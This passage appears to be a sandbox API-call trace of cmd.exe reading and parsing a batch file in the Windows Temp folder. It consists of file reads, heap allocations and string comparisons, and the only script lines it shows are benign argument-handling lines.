returned 0xc4a [0175.745] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe8c0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe8c0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.746] SetFilePointer (in: hFile=0x90, lDistanceToMove=3149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4d [0175.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n/i \"%%A\"==\"-el\" set _elev=1\r\n=======================================================================================\r\n") returned 3 [0175.746] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.746] GetFileType (hFile=0x90) returned 0x1 [0175.746] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.746] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4d [0175.746] GetProcessHeap () returned 0x19a8f1e0000 [0175.746] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.746] GetProcessHeap () returned 0x19a8f1e0000 [0175.746] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.746] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.746] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4d [0175.747] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.747] SetFilePointer (in: hFile=0x90, lDistanceToMove=3152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc50 [0175.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n/i \"%%A\"==\"-el\" set _elev=1\r\n=======================================================================================\r\n") returned 3 [0175.747] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.747] GetFileType (hFile=0x90) returned 0x1 [0175.747] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.747] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc50 [0175.747] GetProcessHeap () returned 0x19a8f1e0000 [0175.747] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.747] GetProcessHeap () returned 0x19a8f1e0000 [0175.747] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.747] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0175.747] _tell (_FileHandle=3) returned 3152 [0175.748] _close (_FileHandle=3) returned 0 [0175.748] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.748] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0175.748] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0175.748] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0175.748] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0175.748] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0175.748] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0175.748] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0175.748] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0175.748] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.748] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.749] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.749] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.749] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.749] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.749] SetConsoleInputExeNameW () returned 0x1 [0175.749] GetConsoleOutputCP () returned 0x1b5 [0175.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.750] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.750] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.751] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.751] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.751] SetFilePointer (in: hFile=0x90, lDistanceToMove=3152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc50 [0175.751] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb80) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7d0) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0175.752] GetProcessHeap () returned 0x19a8f1e0000 [0175.753] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.753] GetProcessHeap () returned 0x19a8f1e0000 [0175.753] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec840) returned 1 [0175.753] GetProcessHeap () returned 0x19a8f1e0000 [0175.753] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0175.753] GetProcessHeap () returned 0x19a8f1e0000 [0175.753] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0175.753] GetProcessHeap () returned 0x19a8f1e0000 [0175.753] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eccc0) returned 1 [0175.753] GetProcessHeap () returned 0x19a8f1e0000 [0175.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f87c0) returned 1 [0175.754] GetProcessHeap () returned 0x19a8f1e0000 [0175.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0175.754] GetProcessHeap () returned 0x19a8f1e0000 [0175.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0175.754] GetProcessHeap () returned 0x19a8f1e0000 [0175.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0175.754] GetProcessHeap () returned 0x19a8f1e0000 [0175.754] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.754] GetProcessHeap () returned 0x19a8f1e0000 [0175.755] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.755] GetProcessHeap () returned 0x19a8f1e0000 [0175.755] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0175.755] GetProcessHeap () returned 0x19a8f1e0000 [0175.755] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0175.755] GetProcessHeap () returned 0x19a8f1e0000 [0175.755] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecde0) returned 1 [0175.756] GetProcessHeap () returned 0x19a8f1e0000 [0175.756] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0175.756] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.756] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc50 [0175.756] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.756] SetFilePointer (in: hFile=0x90, lDistanceToMove=3154, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc52 [0175.756] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\n/i \"%%A\"==\"-el\" set _elev=1\r\n=======================================================================================\r\n") returned 2 [0175.756] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.756] GetFileType (hFile=0x90) returned 0x1 [0175.756] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.756] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc52 [0175.757] GetProcessHeap () returned 0x19a8f1e0000 [0175.757] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.757] GetProcessHeap () returned 0x19a8f1e0000 [0175.757] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.757] _tell (_FileHandle=3) returned 3154 [0175.757] _close (_FileHandle=3) returned 0 [0175.757] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.757] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.757] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.757] SetFilePointer (in: hFile=0x90, lDistanceToMove=3154, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc52 [0175.758] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.758] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc52 [0175.758] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.758] SetFilePointer (in: hFile=0x90, lDistanceToMove=3230, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc9e [0175.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args echo \"%_args%\" | find /i \"/\" >nul && set _MASunattended=1\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined _args echo \"%_args%\" | find /i \"/\" >nul && set _MASunattended=1\r\n==============================================================\r\n") returned 76 [0175.758] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.758] GetFileType (hFile=0x90) returned 0x1 [0175.758] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.758] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc9e [0175.758] GetProcessHeap () returned 0x19a8f1e0000 [0175.758] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.758] GetProcessHeap () returned 0x19a8f1e0000 [0175.758] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f201d30 [0175.758] GetProcessHeap () returned 0x19a8f1e0000 [0175.758] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0175.758] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.758] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0175.758] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0175.758] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0175.758] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0175.758] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0175.758] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0175.759] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0175.759] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0175.759] GetProcessHeap () returned 0x19a8f1e0000 [0175.759] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0175.759] GetProcessHeap () returned 0x19a8f1e0000 [0175.759] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201d30) returned 1 [0175.759] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.760] _wcsicmp (_String1="if", _String2=")") returned 64 [0175.760] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0175.760] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0175.760] _wcsicmp (_String1="IF", _String2="if") returned 0 [0175.760] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecd80 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e08b0 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e08b0, Size=0x22) returned 0x19a8f1eb6b0 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6b0) returned 0x22 [0175.760] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0175.760] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0175.760] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0175.760] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0175.760] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0175.760] GetProcessHeap () returned 0x19a8f1e0000 [0175.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb920 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb920, Size=0x1e) returned 0x19a8f1eb950 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb950) returned 0x1e [0175.761] _wcsicmp (_String1="echo", _String2=")") returned 60 [0175.761] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0175.761] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0175.761] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0175.761] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0175.761] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0175.761] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb800 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb980 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0175.761] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0175.761] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0175.761] _wcsicmp (_String1="IF", _String2="find") returned 3 [0175.761] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0175.761] _wcsicmp (_String1="REM", _String2="find") returned 12 [0175.761] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0175.761] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb6e0 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0970 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec980 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb740 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0175.762] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.762] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.762] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.762] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.762] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.762] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9e0 [0175.762] GetProcessHeap () returned 0x19a8f1e0000 [0175.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0fb0 [0175.762] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0175.762] _tell (_FileHandle=3) returned 3230 [0175.762] _close (_FileHandle=3) returned 0 [0175.763] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.763] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0175.763] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0175.763] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0175.763] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0175.763] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0175.763] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0175.763] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0175.763] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0175.763] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.763] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.763] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.763] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.764] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.764] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.764] SetConsoleInputExeNameW () returned 0x1 [0175.764] GetConsoleOutputCP () returned 0x1b5 [0175.765] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.765] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.765] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.765] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.765] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.765] SetFilePointer (in: hFile=0x90, lDistanceToMove=3230, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc9e [0175.765] GetProcessHeap () returned 0x19a8f1e0000 [0175.766] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0fb0) returned 1 [0175.766] GetProcessHeap () returned 0x19a8f1e0000 [0175.766] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9e0) returned 1 [0175.766] GetProcessHeap () returned 0x19a8f1e0000 [0175.767] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0175.767] GetProcessHeap () returned 0x19a8f1e0000 [0175.767] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0175.772] GetProcessHeap () returned 0x19a8f1e0000 [0175.772] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0175.772] GetProcessHeap () returned 0x19a8f1e0000 [0175.772] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec980) returned 1 [0175.772] GetProcessHeap () returned 0x19a8f1e0000 [0175.773] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0970) returned 1 [0175.773] GetProcessHeap () returned 0x19a8f1e0000 [0175.773] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0175.773] GetProcessHeap () returned 0x19a8f1e0000 [0175.773] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.773] GetProcessHeap () returned 0x19a8f1e0000 [0175.773] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0175.773] GetProcessHeap () returned 0x19a8f1e0000 [0175.774] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0175.774] GetProcessHeap () returned 0x19a8f1e0000 [0175.774] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0175.774] GetProcessHeap () returned 0x19a8f1e0000 [0175.774] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0175.774] GetProcessHeap () returned 0x19a8f1e0000 [0175.774] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0175.774] GetProcessHeap () returned 0x19a8f1e0000 [0175.774] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0175.774] GetProcessHeap () returned 0x19a8f1e0000 [0175.774] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.774] GetProcessHeap () returned 0x19a8f1e0000 [0175.775] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.775] GetProcessHeap () returned 0x19a8f1e0000 [0175.775] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0175.775] GetProcessHeap () returned 0x19a8f1e0000 [0175.775] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.775] GetProcessHeap () returned 0x19a8f1e0000 [0175.775] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd80) returned 1 [0175.775] GetProcessHeap () returned 0x19a8f1e0000 [0175.776] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0175.776] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.776] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc9e [0175.776] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.776] SetFilePointer (in: hFile=0x90, 